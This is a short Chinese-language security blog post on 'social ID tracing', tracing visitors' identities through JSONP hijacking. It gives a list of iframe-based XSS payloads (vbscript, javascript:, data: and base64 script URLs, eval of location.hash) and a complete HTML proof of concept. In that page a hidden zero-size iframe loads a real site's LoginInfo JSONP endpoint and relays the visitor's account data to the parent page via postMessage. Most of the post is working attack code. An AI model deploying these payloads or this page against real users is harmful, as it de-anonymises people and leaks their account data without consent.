社交id溯源
社交id溯源的原理是,利用iFrame注入js脚本,动态添加jsonp的src实现外带cookies,但是在高版本chrome已经失效
这里测试使用的是chrome75,之前先要了解js callback机制
callback机制
调用的接口会返回一个函数体,直接执行callback函数
PAYLOAD
1 2
| </iframe><iframe src="vbscript:msgbox(1)"></iframe> (IE) </iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
|
多种利用方式如下:
1 2 3 4 5 6
| <iframe src="vbscript:msgbox(1)"></iframe> (IE) <iframe src="javascript:alert(1)"></iframe> <iframe src="vbscript:msgbox(1)"></iframe> (IE) <iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari) <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari) http://target.com/something.jsp?query=<script>eval(location.hash.slice(1))</script>#alert(1)
|
整理payload
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
| <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Jsonp</title> </head> <body>
<iframe src="data:text/html,<script>eval(name)</script>" width="0" height="0" name=" window.test = function(data) { let s = {source: 'cnblogs', d: data}; window.parent.postMessage(s, '*'); } let s = document.createElement('script'); s.src = 'https://passport.cnblogs.com/user/LoginInfo?callback=test' document.documentElement.appendChild(s); " style="border-width: 0px;"></iframe>
<script> window.addEventListener("message", function(e){ console.log(event.data); }, false); </script>
</body> </html>
|